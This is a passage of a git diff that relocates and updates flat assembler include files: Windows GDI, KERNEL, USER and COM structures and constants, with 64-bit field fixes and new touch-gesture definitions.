+  lfStrikeOut	   db ?
+  lfCharSet	   db ?
+  lfOutPrecision   db ?
+  lfClipPrecision  db ?
+  lfQuality	   db ?
+  lfPitchAndFamily db ?
+  lfFaceName	   TCHAR 32 dup (?)
+ends
+
+struct ENUMLOGFONT
+  elfLogFont  LOGFONT
+  elfFullName TCHAR 64 dup (?)
+  elfStyle    TCHAR 32 dup (?)
+ends
+
+struct ENUMLOGFONTEX
+  elfLogFont  LOGFONT
+  elfFullName TCHAR 64 dup (?)
+  elfStyle    TCHAR 32 dup (?)
+  elfScript   TCHAR 32 dup (?)
+ends
+
+struct PIXELFORMATDESCRIPTOR
+  nSize 	  dw ?
+  nVersion	  dw ?
+  dwFlags	  dd ?
+  iPixelType	  db ?
+  cColorBits	  db ?
+  cRedBits	  db ?
+  cRedShift	  db ?
+  cGreenBits	  db ?
+  cGreenShift	  db ?
+  cBlueBits	  db ?
+  cBlueShift	  db ?
+  cAlphaBits	  db ?
+  cAlphaShift	  db ?
+  cAccumBits	  db ?
+  cAccumRedBits   db ?
+  cAccumGreenBits db ?
+  cAccumBlueBits  db ?
+  cAccumAlphaBits db ?
+  cDepthBits	  db ?
+  cStencilBits	  db ?
+  cAuxBuffers	  db ?
+  iLayerType	  db ?
+  bReserved	  db ?
+  dwLayerMask	  dd ?
+  dwVisibleMask   dd ?
+  dwDamageMask	  dd ?
+ends
+
+struct TRIVERTEX
+  x	dd ? 
+  y	dd ? 
+  Red	dw ? 
+  Green dw ? 
+  Blue	dw ? 
+  Alpha dw ? 
+ends
+
+; General constants
+
+GDI_ERROR  = 0FFFFFFFFh
+HGDI_ERROR = 0FFFFFFFFh
+
+; Binary raster operations
+
+R2_BLACK       = 1
+R2_NOTMERGEPEN = 2
+R2_MASKNOTPEN  = 3
+R2_NOTCOPYPEN  = 4
+R2_MASKPENNOT  = 5
+R2_NOT	       = 6
+R2_XORPEN      = 7
+R2_NOTMASKPEN  = 8
+R2_MASKPEN     = 9
+R2_NOTXORPEN   = 10
+R2_NOP	       = 11
+R2_MERGENOTPEN = 12
+R2_COPYPEN     = 13
+R2_MERGEPENNOT = 14
+R2_MERGEPEN    = 15
+R2_WHITE       = 16
+
+; Raster operations
+
+SRCCOPY     = 00CC0020h
+SRCPAINT    = 00EE0086h
+SRCAND	    = 008800C6h
+SRCINVERT   = 00660046h
+SRCERASE    = 00440328h
+NOTSRCCOPY  = 00330008h
+NOTSRCERASE = 001100A6h
+MERGECOPY   = 00C000CAh
+MERGEPAINT  = 00BB0226h
+PATCOPY     = 00F00021h
+PATPAINT    = 00FB0A09h
+PATINVERT   = 005A0049h
+DSTINVERT   = 00550009h
+BLACKNESS   = 00000042h
+WHITENESS   = 00FF0062h
+
+; Region flags
+
+ERROR	      = 0
+NULLREGION    = 1
+SIMPLEREGION  = 2
+COMPLEXREGION = 3
+
+; CombineRgn styles
+
+RGN_AND  = 1
+RGN_OR	 = 2
+RGN_XOR  = 3
+RGN_DIFF = 4
+RGN_COPY = 5
+
+; StretchBlt modes
+
+BLACKONWHITE = 1
+WHITEONBLACK = 2
+COLORONCOLOR = 3
+HALFTONE     = 4
+STRETCH_ANDSCANS    = BLACKONWHITE
+STRETCH_ORSCANS     = WHITEONBLACK
+STRETCH_DELETESCANS = COLORONCOLOR
+STRETCH_HALFTONE    = HALFTONE
+
+; PolyFill modes
+
+ALTERNATE = 1
+WINDING   = 2
+
+; Background modes
+
+TRANSPARENT = 1
+OPAQUE	    = 2
+
+; Point types
+
+PT_CLOSEFIGURE = 1
+PT_LINETO      = 2
+PT_BEZIERTO    = 4
+PT_MOVETO      = 6
+
+; Mapping modes
+
+MM_TEXT        = 1
+MM_LOMETRIC    = 2
+MM_HIMETRIC    = 3
+MM_LOENGLISH   = 4
+MM_HIENGLISH   = 5
+MM_TWIPS       = 6
+MM_ISOTROPIC   = 7
+MM_ANISOTROPIC = 8
+
+; Coordinate modes
+
+ABSOLUTE = 1
+RELATIVE = 2
+
+; Stock logical objects
+
+WHITE_BRUSH	    = 0
+LTGRAY_BRUSH	    = 1
+GRAY_BRUSH	    = 2
+DKGRAY_BRUSH	    = 3
+BLACK_BRUSH	    = 4
+NULL_BRUSH	    = 5
+HOLLOW_BRUSH	    = NULL_BRUSH
+WHITE_PEN	    = 6
+BLACK_PEN	    = 7
+NULL_PEN	    = 8
+OEM_FIXED_FONT	    = 10
+ANSI_FIXED_FONT     = 11
+ANSI_VAR_FONT	    = 12
+SYSTEM_FONT	    = 13
+DEVICE_DEFAULT_FONT = 14
+DEFAULT_PALETTE     = 15
+SYSTEM_FIXED_FONT   = 16
+DEFAULT_GUI_FONT    = 17
+
+; Brush styles
+
+BS_SOLID	 = 0
+BS_NULL 	 = 1
+BS_HOLLOW	 = BS_NULL
+BS_HATCHED	 = 2
+BS_PATTERN	 = 3
+BS_INDEXED	 = 4
+BS_DIBPATTERN	 = 5
+BS_DIBPATTERNPT  = 6
+BS_PATTERN8X8	 = 7
+BS_DIBPATTERN8X8 = 8
+BS_MONOPATTERN	 = 9
+
+; Hatch styles
+
+HS_HORIZONTAL = 0
+HS_VERTICAL   = 1
+HS_FDIAGONAL  = 2
+HS_BDIAGONAL  = 3
+HS_CROSS      = 4
+HS_DIAGCROSS  = 5
+
+; Pen styles
+
+PS_SOLID	 = 0
+PS_DASH 	 = 1
+PS_DOT		 = 2
+PS_DASHDOT	 = 3
+PS_DASHDOTDOT	 = 4
+PS_NULL 	 = 5
+PS_INSIDEFRAME	 = 6
+PS_USERSTYLE	 = 7
+PS_ALTERNATE	 = 8
+PS_ENDCAP_ROUND  = 0
+PS_ENDCAP_SQUARE = 100h
+PS_ENDCAP_FLAT	 = 200h
+PS_JOIN_ROUND	 = 0
+PS_JOIN_BEVEL	 = 1000h
+PS_JOIN_MITER	 = 2000h
+PS_COSMETIC	 = 0
+PS_GEOMETRIC	 = 010000h
+
+; Arc directions
+
+AD_COUNTERCLOCKWISE = 1
+AD_CLOCKWISE	    = 2
+
+; Text alignment options
+
+TA_NOUPDATECP = 0
+TA_UPDATECP   = 1
+TA_LEFT       = 0
+TA_RIGHT      = 2
+TA_CENTER     = 6
+TA_TOP	      = 0
+TA_BOTTOM     = 8
+TA_BASELINE   = 24
+TA_RTLREADING = 100h
+VTA_BASELINE  = TA_BASELINE
+VTA_LEFT      = TA_BOTTOM
+VTA_RIGHT     = TA_TOP
+VTA_CENTER    = TA_CENTER
+VTA_BOTTOM    = TA_RIGHT
+VTA_TOP       = TA_LEFT
+
+; ExtTextOut options
+
+ETO_OPAQUE	   = 0002h
+ETO_CLIPPED	   = 0004h
+ETO_GLYPH_INDEX    = 0010h
+ETO_RTLREADING	   = 0080h
+ETO_IGNORELANGUAGE = 1000h
+
+; Bitmap compression types
+
+BI_RGB	     = 0
+BI_RLE8      = 1
+BI_RLE4      = 2
+BI_BITFIELDS = 3
+
+; tmPitchAndFamily flags
+
+TMPF_FIXED_PITCH = 1
+TMPF_VECTOR	 = 2
+TMPF_TRUETYPE	 = 4
+TMPF_DEVICE	 = 8
+
+; Font output precision values
+
+OUT_DEFAULT_PRECIS	  = 0
+OUT_STRING_PRECIS	  = 1
+OUT_CHARACTER_PRECIS	  = 2
+OUT_STROKE_PRECIS	  = 3
+OUT_TT_PRECIS		  = 4
+OUT_DEVICE_PRECIS	  = 5
+OUT_RASTER_PRECIS	  = 6
+OUT_TT_ONLY_PRECIS	  = 7
+OUT_OUTLINE_PRECIS	  = 8
+OUT_SCREEN_OUTLINE_PRECIS = 9
+
+; Font clipping precision values
+
+CLIP_DEFAULT_PRECIS   = 0
+CLIP_CHARACTER_PRECIS = 1
+CLIP_STROKE_PRECIS    = 2
+CLIP_LH_ANGLES	      = 10h
+CLIP_TT_ALWAYS	      = 20h
+CLIP_EMBEDDED	      = 80h
+
+; Font output quality values
+
+DEFAULT_QUALITY        = 0
+DRAFT_QUALITY	       = 1
+PROOF_QUALITY	       = 2
+NONANTIALIASED_QUALITY = 3
+ANTIALIASED_QUALITY    = 4
+
+; Font pitch values
+
+DEFAULT_PITCH  = 0
+FIXED_PITCH    = 1
+VARIABLE_PITCH = 2
+MONO_FONT      = 8
+
+; Font families
+
+FF_DONTCARE   = 00h
+FF_ROMAN      = 10h
+FF_SWISS      = 20h
+FF_MODERN     = 30h
+FF_SCRIPT     = 40h
+FF_DECORATIVE = 50h
+
+; Font weights
+
+FW_DONTCARE   = 0
+FW_THIN       = 100
+FW_EXTRALIGHT = 200
+FW_LIGHT      = 300
+FW_NORMAL     = 400
+FW_MEDIUM     = 500
+FW_SEMIBOLD   = 600
+FW_BOLD       = 700
+FW_EXTRABOLD  = 800
+FW_HEAVY      = 900
+FW_ULTRALIGHT = FW_EXTRALIGHT
+FW_REGULAR    = FW_NORMAL
+FW_DEMIBOLD   = FW_SEMIBOLD
+FW_ULTRABOLD  = FW_EXTRABOLD
+FW_BLACK      = FW_HEAVY
+
+; Character set values
+
+ANSI_CHARSET	    = 0
+DEFAULT_CHARSET     = 1
+SYMBOL_CHARSET	    = 2
+SHIFTJIS_CHARSET    = 128
+HANGEUL_CHARSET     = 129
+GB2312_CHARSET	    = 134
+CHINESEBIG5_CHARSET = 136
+OEM_CHARSET	    = 255
+JOHAB_CHARSET	    = 130
+HEBREW_CHARSET	    = 177
+ARABIC_CHARSET	    = 178
+GREEK_CHARSET	    = 161
+TURKISH_CHARSET     = 162
+VIETNAMESE_CHARSET  = 163
+THAI_CHARSET	    = 222
+EASTEUROPE_CHARSET  = 238
+RUSSIAN_CHARSET     = 204
+MAC_CHARSET	    = 77
+BALTIC_CHARSET	    = 186
+
+; Pixel format constants
+
+PFD_TYPE_RGBA		  = 0
+PFD_TYPE_COLORINDEX	  = 1
+PFD_MAIN_PLANE		  = 0
+PFD_OVERLAY_PLANE	  = 1
+PFD_UNDERLAY_PLANE	  = -1
+PFD_DOUBLEBUFFER	  = 1
+PFD_STEREO		  = 2
+PFD_DRAW_TO_WINDOW	  = 4
+PFD_DRAW_TO_BITMAP	  = 8
+PFD_SUPPORT_GDI 	  = 10h
+PFD_SUPPORT_OPENGL	  = 20h
+PFD_GENERIC_FORMAT	  = 40h
+PFD_NEED_PALETTE	  = 80h
+PFD_NEED_SYSTEM_PALETTE   = 100h
+PFD_SWAP_EXCHANGE	  = 200h
+PFD_SWAP_COPY		  = 400h
+PFD_SWAP_LAYER_BUFFERS	  = 800h
+PFD_GENERIC_ACCELERATED   = 1000h
+PFD_DEPTH_DONTCARE	  = 20000000h
+PFD_DOUBLEBUFFER_DONTCARE = 40000000h
+PFD_STEREO_DONTCARE	  = 80000000h
diff --git a/binary/hyperion/source/Fasm/fasminclude/EQUATES/KERNEL32.INC b/binary/hyperion/source/Fasm/INCLUDE/EQUATES/KERNEL32.INC
old mode 100644
new mode 100755
similarity index 96%
rename from binary/hyperion/source/Fasm/fasminclude/EQUATES/KERNEL32.INC
rename to binary/hyperion/source/Fasm/INCLUDE/EQUATES/KERNEL32.INC
index e935de5..b043e1e
--- a/binary/hyperion/source/Fasm/fasminclude/EQUATES/KERNEL32.INC
+++ b/binary/hyperion/source/Fasm/INCLUDE/EQUATES/KERNEL32.INC
@@ -43,7 +43,7 @@ struct OSVERSIONINFOW
 ends
 
 struct MEMORYSTATUS
-  dwiLength	  dd ?
+  dwLength	  dd ?
   dwMemoryLoad	  dd ?
   dwTotalPhys	  dd ?
   dwAvailPhys	  dd ?
diff --git a/binary/hyperion/source/Fasm/fasminclude/EQUATES/KERNEL64.INC b/binary/hyperion/source/Fasm/INCLUDE/EQUATES/KERNEL64.INC
old mode 100644
new mode 100755
similarity index 95%
rename from binary/hyperion/source/Fasm/fasminclude/EQUATES/KERNEL64.INC
rename to binary/hyperion/source/Fasm/INCLUDE/EQUATES/KERNEL64.INC
index f08b04a..3e05b24
--- a/binary/hyperion/source/Fasm/fasminclude/EQUATES/KERNEL64.INC
+++ b/binary/hyperion/source/Fasm/INCLUDE/EQUATES/KERNEL64.INC
@@ -7,7 +7,7 @@ struct SYSTEM_INFO
   dwPageSize		      dd ?
   lpMinimumApplicationAddress dq ?
   lpMaximumApplicationAddress dq ?
-  dwActiveProcessorMask       dd ?
+  dwActiveProcessorMask       dq ?
   dwNumberOfProcessors	      dd ?
   dwProcessorType	      dd ?
   dwAllocationGranularity     dd ?
@@ -43,14 +43,14 @@ struct OSVERSIONINFOW
 ends
 
 struct MEMORYSTATUS
-  dwiLength	  dd ?
+  dwLength	  dd ?
   dwMemoryLoad	  dd ?
-  dwTotalPhys	  dd ?
-  dwAvailPhys	  dd ?
-  dwTotalPageFile dd ?
-  dwAvailPageFile dd ?
-  dwTotalVirtual  dd ?
-  dwAvailVirtual  dd ?
+  dwTotalPhys	  dq ?
+  dwAvailPhys	  dq ?
+  dwTotalPageFile dq ?
+  dwAvailPageFile dq ?
+  dwTotalVirtual  dq ?
+  dwAvailVirtual  dq ?
 ends
 
 struct STARTUPINFO
diff --git a/binary/hyperion/source/Fasm/fasminclude/EQUATES/SHELL32.INC b/binary/hyperion/source/Fasm/INCLUDE/EQUATES/SHELL32.INC
old mode 100644
new mode 100755
similarity index 100%
rename from binary/hyperion/source/Fasm/fasminclude/EQUATES/SHELL32.INC
rename to binary/hyperion/source/Fasm/INCLUDE/EQUATES/SHELL32.INC
diff --git a/binary/hyperion/source/Fasm/fasminclude/EQUATES/SHELL64.INC b/binary/hyperion/source/Fasm/INCLUDE/EQUATES/SHELL64.INC
old mode 100644
new mode 100755
similarity index 100%
rename from binary/hyperion/source/Fasm/fasminclude/EQUATES/SHELL64.INC
rename to binary/hyperion/source/Fasm/INCLUDE/EQUATES/SHELL64.INC
diff --git a/binary/hyperion/source/Fasm/fasminclude/EQUATES/USER32.INC b/binary/hyperion/source/Fasm/INCLUDE/EQUATES/USER32.INC
old mode 100644
new mode 100755
similarity index 92%
rename from binary/hyperion/source/Fasm/fasminclude/EQUATES/USER32.INC
rename to binary/hyperion/source/Fasm/INCLUDE/EQUATES/USER32.INC
index a8bfc65..37b7ff1
--- a/binary/hyperion/source/Fasm/fasminclude/EQUATES/USER32.INC
+++ b/binary/hyperion/source/Fasm/INCLUDE/EQUATES/USER32.INC
@@ -6,6 +6,11 @@ struct POINT
   y dd ?
 ends
 
+struct POINTS
+  x dw ?
+  y dw ?
+ends
+
 struct RECT
   left	 dd ?
   top	 dd ?
@@ -202,6 +207,24 @@ struct MSGBOXPARAMS
   dwLanguageId	     dd ?
 ends
 
+struct GESTURECONFIG
+  dwID	  dd ?
+  dwWant  dd ?
+  dwBlock dd ?
+ends
+
+struct GESTUREINFO
+  cbSize       dd ?
+  dwFlags      dd ?
+  dwID	       dd ?
+  hwndTarget   dd ?
+  ptsLocation  POINTS
+  dwInstanceID dd ?
+  dwSequenceID dd ?,?
+  ullArguments dq ?
+  cbExtraArgs  dd ?,?
+ends
+
 ; MessageBox type flags
 
 MB_OK			= 000000h
@@ -514,6 +537,8 @@ WM_HSCROLL		  = 0114h
 WM_VSCROLL		  = 0115h
 WM_INITMENU		  = 0116h
 WM_INITMENUPOPUP	  = 0117h
+WM_GESTURE		  = 0119h
+WM_GESTURENOTIFY	  = 011Ah
 WM_MENUSELECT		  = 011Fh
 WM_MENUCHAR		  = 0120h
 WM_ENTERIDLE		  = 0121h
@@ -1864,3 +1889,45 @@ SPI_SETWORKAREA 	  = 47
 
 SPIF_UPDATEINIFILE	  = 1
 SPIF_SENDWININICHANGE	  = 2
+
+; Gesture Information Flags
+
+GF_BEGIN   = 1
+GF_INERTIA = 2
+GF_END	   = 4
+
+; Gesture IDs
+
+GID_BEGIN	 = 1
+GID_END 	 = 2
+GID_ZOOM	 = 3
+GID_PAN 	 = 4
+GID_ROTATE	 = 5
+GID_TWOFINGERTAP = 6
+GID_PRESSANDTAP  = 7
+GID_ROLLOVER	 = GID_PRESSANDTAP
+
+; Zoom Gesture Confiration Flags
+
+GC_ZOOM = 0x00000001
+
+; Pan Gesture Configuration Flags
+
+GC_PAN				       = 0x00000001
+GC_PAN_WITH_SINGLE_FINGER_VERTICALLY   = 0x00000002
+GC_PAN_WITH_SINGLE_FINGER_HORIZONTALLY = 0x00000004
+GC_PAN_WITH_GUTTER		       = 0x00000008
+GC_PAN_WITH_INERTIA		       = 0x00000010
+
+; Rotate Gesture Configuration Flags
+
+GC_ROTATE = 0x00000001
+
+; Two finger tap configuration flags
+
+GC_TWOFINGERTAP = 0x00000001
+
+; Press and tap Configuration Flags
+
+GC_PRESSANDTAP = 0x00000001
+GC_ROLLOVER    = GC_PRESSANDTAP
diff --git a/binary/hyperion/source/Fasm/fasminclude/EQUATES/USER64.INC b/binary/hyperion/source/Fasm/INCLUDE/EQUATES/USER64.INC
old mode 100644
new mode 100755
similarity index 91%
rename from binary/hyperion/source/Fasm/fasminclude/EQUATES/USER64.INC
rename to binary/hyperion/source/Fasm/INCLUDE/EQUATES/USER64.INC
index 4fe2cd1..7ff7600
--- a/binary/hyperion/source/Fasm/fasminclude/EQUATES/USER64.INC
+++ b/binary/hyperion/source/Fasm/INCLUDE/EQUATES/USER64.INC
@@ -6,6 +6,11 @@ struct POINT
   y dd ?
 ends
 
+struct POINTS
+  x dw ?
+  y dw ?
+ends
+
 struct RECT
   left	 dd ?
   top	 dd ?
@@ -111,8 +116,8 @@ struct WINDOWPLACEMENT
 ends
 
 struct WINDOWPOS
-  hwnd		  dd ?
-  hwndInsertAfter dd ?
+  hwnd		  dq ?
+  hwndInsertAfter dq ?
   x		  dd ?
   y		  dd ?
   cx		  dd ?
@@ -122,8 +127,8 @@ ends
 
 struct NMHDR
   hwndFrom dq ?
-  idFrom   dd ?
-  code	   dd ?
+  idFrom   dq ?
+  code	   dd ?,?
 ends
 
 struct COPYDATASTRUCT
@@ -168,16 +173,18 @@ struct DRAWITEMSTRUCT
 ends
 
 struct MENUITEMINFO
-  cbSize	dd ?
-  fMask 	dd ?
-  fType 	dd ?
-  fState	dd ?
-  wID		dd ?,?
-  hSubMenu	dq ?
-  hbmpChecked	dq ?
-  hbmpUnchecked dq ?
-  dwItemData	dd ?
-  dwTypeData	dd ?
+  cbSize	dd ? 
+  fMask 	dd ? 
+  fType 	dd ? 
+  fState	dd ? 
+  wID		dd ?,? 
+  hSubMenu	dq ? 
+  hbmpChecked	dq ? 
+  hbmpUnchecked dq ? 
+  dwItemData	dq ? 
+  dwTypeData	dq ? 
+  cch		dd ?,? 
+  hbmpItem	dq ? 
 ends
 
 struct MEASUREITEMSTRUCT
@@ -186,7 +193,7 @@ struct MEASUREITEMSTRUCT
   itemID     dd ?
   itemWidth  dd ?
   itemHeight dd ?
-  itemData   dd ?
+  itemData   dq ?
 ends
 
 struct MSGBOXPARAMS
@@ -202,6 +209,24 @@ struct MSGBOXPARAMS
   dwLanguageId	     dd ?,?
 ends
 
+struct GESTURECONFIG
+  dwID	  dd ?
+  dwWant  dd ?
+  dwBlock dd ?
+ends
+
+struct GESTUREINFO
+  cbSize       dd ?
+  dwFlags      dd ?
+  dwID	       dd ?
+  hwndTarget   dd ?
+  ptsLocation  POINTS
+  dwInstanceID dd ?
+  dwSequenceID dd ?,?
+  ullArguments dq ?
+  cbExtraArgs  dd ?,?
+ends
+
 ; MessageBox type flags
 
 MB_OK			= 000000h
@@ -514,6 +539,8 @@ WM_HSCROLL		  = 0114h
 WM_VSCROLL		  = 0115h
 WM_INITMENU		  = 0116h
 WM_INITMENUPOPUP	  = 0117h
+WM_GESTURE		  = 0119h
+WM_GESTURENOTIFY	  = 011Ah
 WM_MENUSELECT		  = 011Fh
 WM_MENUCHAR		  = 0120h
 WM_ENTERIDLE		  = 0121h
@@ -831,16 +858,16 @@ DLGWINDOWEXTRA = 30
 
 ; GetWindowLong offsets
 
-GWL_WNDPROC	  = -4
-GWL_HINSTANCE	  = -6
-GWL_HWNDPARENT	  = -8
-GWL_STYLE	  = -16
-GWL_EXSTYLE	  = -20
-GWL_USERDATA	  = -21
-GWL_ID		  = -12
-DWL_MSGRESULT	  = 0
-DWL_DLGPROC	  = 4
-DWL_USER	  = 8
+GWLP_WNDPROC	   = -4
+GWLP_HINSTANCE	   = -6
+GWLP_HWNDPARENT    = -8
+GWLP_ID 	   = -12
+GWLP_STYLE	   = -16
+GWLP_EXSTYLE	   = -20
+GWLP_USERDATA	   = -21
+DWLP_MSGRESULT	   = 0
+DWLP_DLGPROC	   = 8
+DWLP_USER	   = 16
 
 ; GetSystemMetrics codes
 
@@ -1864,3 +1891,45 @@ SPI_SETWORKAREA 	  = 47
 
 SPIF_UPDATEINIFILE	  = 1
 SPIF_SENDWININICHANGE	  = 2
+
+; Gesture Information Flags
+
+GF_BEGIN   = 1
+GF_INERTIA = 2
+GF_END	   = 4
+
+; Gesture IDs
+
+GID_BEGIN	 = 1
+GID_END 	 = 2
+GID_ZOOM	 = 3
+GID_PAN 	 = 4
+GID_ROTATE	 = 5
+GID_TWOFINGERTAP = 6
+GID_PRESSANDTAP  = 7
+GID_ROLLOVER	 = GID_PRESSANDTAP
+
+; Zoom Gesture Confiration Flags
+
+GC_ZOOM = 0x00000001
+
+; Pan Gesture Configuration Flags
+
+GC_PAN				       = 0x00000001
+GC_PAN_WITH_SINGLE_FINGER_VERTICALLY   = 0x00000002
+GC_PAN_WITH_SINGLE_FINGER_HORIZONTALLY = 0x00000004
+GC_PAN_WITH_GUTTER		       = 0x00000008
+GC_PAN_WITH_INERTIA		       = 0x00000010
+
+; Rotate Gesture Configuration Flags
+
+GC_ROTATE = 0x00000001
+
+; Two finger tap configuration flags
+
+GC_TWOFINGERTAP = 0x00000001
+
+; Press and tap Configuration Flags
+
+GC_PRESSANDTAP = 0x00000001
+GC_ROLLOVER    = GC_PRESSANDTAP
diff --git a/binary/hyperion/source/Fasm/fasminclude/EQUATES/WSOCK32.INC b/binary/hyperion/source/Fasm/INCLUDE/EQUATES/WSOCK32.INC
old mode 100644
new mode 100755
similarity index 100%
rename from binary/hyperion/source/Fasm/fasminclude/EQUATES/WSOCK32.INC
rename to binary/hyperion/source/Fasm/INCLUDE/EQUATES/WSOCK32.INC
diff --git a/binary/hyperion/source/Fasm/fasminclude/MACRO/COM32.INC b/binary/hyperion/source/Fasm/INCLUDE/MACRO/COM32.INC
old mode 100644
new mode 100755
similarity index 63%
rename from binary/hyperion/source/Fasm/fasminclude/MACRO/COM32.INC
rename to binary/hyperion/source/Fasm/INCLUDE/MACRO/COM32.INC
index c73fdf7..318749c
--- a/binary/hyperion/source/Fasm/fasminclude/MACRO/COM32.INC
+++ b/binary/hyperion/source/Fasm/INCLUDE/MACRO/COM32.INC
@@ -8,10 +8,7 @@ macro cominvk object,proc,[arg]
      pushd arg
    common
     end if
-    if ~ defined com.object.#object
-     display 'Error: not a COM object.',0Dh,0Ah
-     rb -1
-    end if
+    assert defined object#.com.object ; must be a COM object
     mov eax,[object]
     push eax
     mov eax,[eax]
@@ -24,10 +21,7 @@ macro comcall handle,interface,proc,[arg]
      pushd arg
    common
     end if
-    if ~ defined com.interface.#interface
-     display 'Error: not a COM interface.',0Dh,0Ah
-     rb -1
-    end if
+    assert defined interface#.com.interface ; must be a COM interface
     if handle eqtype eax | handle eqtype 0
      push handle
      local ..handle
@@ -43,18 +37,17 @@ macro comcall handle,interface,proc,[arg]
 macro interface name,[proc]
  { common
     struc name \{
-    match any, fields@struct \\{ fields@struct equ fields@struct,.,name, \\}
-    match , fields@struct \\{ . dd ?
+    match , @struct \\{ define field@struct .,name, \\}
+    match no, @struct \\{ . dd ?
     virtual at 0
    forward
     .#proc dd ?
    common
-    com.object.\#. = com.interface.#name
+    .\#\\.com.object = name#.com.interface
     end virtual \\} \}
     virtual at 0
    forward
      name#.#proc dd ?
    common
-     com.interface.#name = $ shr 2
+     name#.com.interface = $ shr 2
     end virtual }
-
diff --git a/binary/hyperion/source/Fasm/fasminclude/MACRO/COM64.INC b/binary/hyperion/source/Fasm/INCLUDE/MACRO/COM64.INC
old mode 100644
new mode 100755
similarity index 58%
rename from binary/hyperion/source/Fasm/fasminclude/MACRO/COM64.INC
rename to binary/hyperion/source/Fasm/INCLUDE/MACRO/COM64.INC
index 93861cd..60ef71e
--- a/binary/hyperion/source/Fasm/fasminclude/MACRO/COM64.INC
+++ b/binary/hyperion/source/Fasm/INCLUDE/MACRO/COM64.INC
@@ -3,26 +3,19 @@
 
 macro cominvk object,proc,[arg]
  { common
-    if ~ defined com.object.#object
-     display 'Error: not a COM object.',0Dh,0Ah
-     rb -1
-    end if
+    assert defined object#.com.object ; must be a COM object
     macro call dummy
     \{ mov rax,[object]
        mov rax,[rax]
        call [rax+object#.#proc] \}
-    fastcall proc,[object],arg
+    fastcall ,[object],arg
     purge call }
 
 macro comcall handle,interface,proc,[arg]
  { common
-    if ~ defined com.interface.#interface
-     display 'Error: not a COM interface.',0Dh,0Ah
-     rb -1
-    end if
+    assert defined interface#.com.interface ; must be a COM interface
     macro call dummy
     \{ if handle eqtype rax | handle eqtype 0
-	push handle
 	local ..handle
 	label ..handle at handle
 	mov rax,[..handle]
@@ -31,24 +24,24 @@ macro comcall handle,interface,proc,[arg]
 	mov rax,[rax]
        end if
        call [rax+interface#.#proc] \}
-    fastcall proc,handle,arg
+    fastcall ,handle,arg
     purge call }
 
 macro interface name,[proc]
  { common
     struc name \{
-    match any, fields@struct \\{ fields@struct equ fields@struct,.,name, \\}
-    match , fields@struct \\{ . dq ?
+    match , @struct \\{ define field@struct .,name, \\}
+    match no, @struct \\{ . dq ?
     virtual at 0
    forward
     .#proc dq ?
    common
-    com.object.\#. = com.interface.#name
+    .\#\\.com.object = name#.com.interface
     end virtual \\} \}
     virtual at 0
    forward
      name#.#proc dq ?
    common
-     com.interface.#name = $ shr 2
+     name#.com.interface = $ shr 3
     end virtual }
 
diff --git a/binary/hyperion/source/Fasm/fasminclude/MACRO/EXPORT.INC b/binary/hyperion/source/Fasm/INCLUDE/MACRO/EXPORT.INC
old mode 100644
new mode 100755
similarity index 100%
rename from binary/hyperion/source/Fasm/fasminclude/MACRO/EXPORT.INC
rename to binary/hyperion/source/Fasm/INCLUDE/MACRO/EXPORT.INC
diff --git a/binary/hyperion/source/Fasm/fasminclude/MACRO/IF.INC b/binary/hyperion/source/Fasm/INCLUDE/MACRO/IF.INC
old mode 100644
new mode 100755
similarity index 100%
rename from binary/hyperion/source/Fasm/fasminclude/MACRO/IF.INC
rename to binary/hyperion/source/Fasm/INCLUDE/MACRO/IF.INC
diff --git a/binary/hyperion/source/Fasm/fasminclude/MACRO/IMPORT32.INC b/binary/hyperion/source/Fasm/INCLUDE/MACRO/IMPORT32.INC
old mode 100644
new mode 100755
similarity index 91%
rename from binary/hyperion/source/Fasm/fasminclude/MACRO/IMPORT32.INC
rename to binary/hyperion/source/Fasm/INCLUDE/MACRO/IMPORT32.INC
index 2c40e72..e6369a4
--- a/binary/hyperion/source/Fasm/fasminclude/MACRO/IMPORT32.INC
+++ b/binary/hyperion/source/Fasm/INCLUDE/MACRO/IMPORT32.INC
@@ -2,7 +2,9 @@
 ; Macroinstructions for making import section
 
 macro library [name,string]
- { forward
+ { common
+    import.data:
+   forward
     local _label
     if defined name#.redundant
      if ~ name#.redundant
diff --git a/binary/hyperion/source/Fasm/fasminclude/MACRO/IMPORT64.INC b/binary/hyperion/source/Fasm/INCLUDE/MACRO/IMPORT64.INC
old mode 100644
new mode 100755
similarity index 92%
rename from binary/hyperion/source/Fasm/fasminclude/MACRO/IMPORT64.INC
rename to binary/hyperion/source/Fasm/INCLUDE/MACRO/IMPORT64.INC
index 9ed6d94..7fd24bd
--- a/binary/hyperion/source/Fasm/fasminclude/MACRO/IMPORT64.INC
+++ b/binary/hyperion/source/Fasm/INCLUDE/MACRO/IMPORT64.INC
@@ -2,7 +2,9 @@
 ; Macroinstructions for making import section (64-bit)
 
 macro library [name,string]
- { forward
+ { common
+    import.data:
+   forward
     local _label
     if defined name#.redundant
      if ~ name#.redundant
diff --git a/binary/hyperion/source/Fasm/fasminclude/MACRO/MASM.INC b/binary/hyperion/source/Fasm/INCLUDE/MACRO/MASM.INC
old mode 100644
new mode 100755
similarity index 69%
rename from binary/hyperion/source/Fasm/fasminclude/MACRO/MASM.INC
rename to binary/hyperion/source/Fasm/INCLUDE/MACRO/MASM.INC
index ace7dbf..a77fdde
--- a/binary/hyperion/source/Fasm/fasminclude/MACRO/MASM.INC
+++ b/binary/hyperion/source/Fasm/INCLUDE/MACRO/MASM.INC
@@ -31,13 +31,15 @@ macro assume params
       macro label . \\{ local def
 			define def .
 			match =reg =at label, def \\\{ define def \\\}
-			match any,def \\\{ def@assumed reg,.,: \\\} \\}
-      struc db [val] \\{ \common def@assumed reg,.,db val \\}
-      struc dw [val] \\{ \common def@assumed reg,.,dw val \\}
-      struc dp [val] \\{ \common def@assumed reg,.,dp val \\}
-      struc dd [val] \\{ \common def@assumed reg,.,dd val \\}
-      struc dt [val] \\{ \common def@assumed reg,.,dt val \\}
-      struc dq [val] \\{ \common def@assumed reg,.,dq val \\}
+			match name at,def \\\{ def@assumed reg,name,label at
+					       define def \\\}
+			match name,def \\\{ def@assumed reg,.,: \\\} \\}
+      struc db [val] \\{ \common def@assumed reg,., \\}
+      struc dw [val] \\{ \common def@assumed reg,., \\}
+      struc dp [val] \\{ \common def@assumed reg,., \\}
+      struc dd [val] \\{ \common def@assumed reg,.,
 \\}
+      struc dt [val] \\{ \common def@assumed reg,.,
 \\}
+      struc dq [val] \\{ \common def@assumed reg,., \\}
       struc rb cnt \\{ def@assumed reg,.,rb cnt \\}
       struc rw cnt \\{ def@assumed reg,.,rw cnt \\}
       struc rp cnt \\{ def@assumed reg,.,rp cnt \\}
@@ -59,4 +61,6 @@ macro def@assumed reg,name,def
    name equ ..label
    ..label def }
 
+struc label type { label . type }
+
